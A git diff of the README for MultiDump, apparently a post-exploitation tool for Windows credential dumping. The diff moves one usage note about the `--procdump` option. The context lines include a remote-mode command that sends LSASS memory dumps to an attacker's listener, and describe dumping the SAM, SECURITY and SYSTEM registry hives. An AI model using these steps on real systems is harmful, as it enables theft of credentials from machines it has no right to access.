diff --git a/README.md b/README.md
index 837b2ea..2d16ad5 100644
--- a/README.md
+++ b/README.md
@@ -74,6 +74,8 @@ MultiDump.exe
 
 If `--procdump` is used, `ProcDump.exe` will be writtern to disk to dump LSASS.
 
+In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
+
 In remote mode, MultiDump connects to the handler's listener.
 
 ```bash
@@ -85,8 +87,6 @@ In remote mode, MultiDump connects to the handler's listener.
 MultiDump.exe -r 10.0.0.1:9001
 ```
 
-In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
-
 The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.
 
 An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.